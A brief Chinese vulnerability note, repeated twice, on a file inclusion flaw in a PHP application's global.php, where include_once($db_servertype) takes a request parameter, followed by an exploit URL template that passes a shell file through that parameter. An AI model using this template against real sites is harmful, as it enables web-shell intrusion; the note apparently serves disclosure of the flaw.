##1.漏洞分析 global.php ```php include_once($db_servertype); ``` 直接包含文件产生了包含漏洞。 ##2.漏洞利用 http://[host]/global.php?db_servertype=[shell]
##1.漏洞分析 global.php ```php include_once($db_servertype); ``` 直接包含文件产生了包含漏洞。 ##2.漏洞利用 http://[host]/global.php?db_servertype=[shell]